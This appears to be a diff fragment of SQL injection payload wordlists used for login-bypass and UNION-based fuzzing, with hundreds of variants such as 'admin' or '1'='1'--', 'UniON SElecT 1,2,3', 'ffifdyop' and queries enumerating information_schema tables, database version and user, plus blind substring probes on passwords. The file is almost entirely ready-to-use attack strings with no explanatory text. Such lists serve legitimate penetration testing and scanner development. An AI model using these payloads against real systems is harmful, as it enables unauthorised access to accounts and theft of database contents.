||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
